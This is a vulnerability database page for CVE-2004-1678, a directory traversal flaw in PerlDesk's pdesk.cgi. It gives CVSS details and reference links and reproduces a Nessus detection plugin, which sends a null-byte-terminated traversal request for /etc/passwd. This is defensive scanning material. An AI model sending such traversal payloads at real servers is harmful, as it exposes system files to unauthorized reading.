Vulnerabilities > CVE-2004-1678 - Unspecified vulnerability in Logicnow Perldesk

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
logicnow
nessus
exploit available
NVD
Published: 2004-09-13
Updated: 2017-07-11

Summary

Directory traversal vulnerability in pdesk.cgi in PerlDesk allows remote attackers to read portions of arbitrary files and possibly execute arbitrary Perl modules via ".." sequences terminated by a %00 (null) character in the lang parameter, which can leak portions of the requested files if a compilation error message occurs.

Vulnerable Configurations

Part Description Count
Application
Logicnow
1

Exploit-Db

descriptionPerlDesk Language Variable Server-Side Script Execution Vulnerability. CVE-2004-1678. Webapps exploit for cgi platform
idEDB-ID:24591
last seen2016-02-02
modified2004-09-13
published2004-09-13
reporterNikyt0x Argentina
sourcehttps://www.exploit-db.com/download/24591/
titlePerlDesk Language Variable Server-Side Script Execution Vulnerability

Nessus

NASL familyCGI abuses
NASL idPERLDESK_SCRIPT_EXEC.NASL
descriptionThe remote host is running PerlDesk, a web-based help desk and email management application written in perl. There is a file inclusion issue in the remote version of this software which may allow an attacker to read fragments of arbitrary files on the remote host and to execute arbirary perl scripts, provided that an attacker may upload a script in the first place.
last seen2020-06-01
modified2020-06-02
plugin id14733
published2004-09-15
reporterThis script is Copyright (C) 2004-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/14733
titlePerlDesk pdesk.cgi lang Parameter Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if (description)
{
 script_id(14733);
 script_version("1.13");
 script_cve_id("CVE-2004-1678");
 script_bugtraq_id(11160);

 script_name(english:"PerlDesk pdesk.cgi lang Parameter Traversal Arbitrary File Access");

 script_set_attribute(attribute:"synopsis", value:
"It is possible to read arbitrary files from the remote
system." );
 script_set_attribute(attribute:"description", value:
"The remote host is running PerlDesk, a web-based help desk 
and email management application written in perl.

There is a file inclusion issue in the remote version of 
this software which may allow an attacker to read fragments 
of arbitrary files on the remote host and to execute arbirary
perl scripts, provided that an attacker may upload a script 
in the first place." );
 script_set_attribute(attribute:"solution", value:
"Upgrade to the latest version of this software." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"plugin_publication_date", value: "2004/09/15");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/09/12");
 script_cvs_date("Date: 2018/07/24 18:56:10");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 script_summary(english:"Determines if perldesk is vulnerable to a file inclusion");
 script_category(ACT_GATHER_INFO);
 script_family(english:"CGI abuses");
 script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");
 script_dependencie("find_service1.nasl", "http_version.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

include("global_settings.inc");
include("http.inc");
include("misc_func.inc");

port = get_http_port(default:80);

res = http_send_recv3(port:port, method:"GET", item:"/cgi-bin/pdesk.cgi?lang=../../../../../../../../etc/passwd%00", exit_on_fail: 1);
 
if('"*:0"' >< res[2] && '"/bin/' >< res[2] )
{
  security_warning(port);
  exit(0);
}

References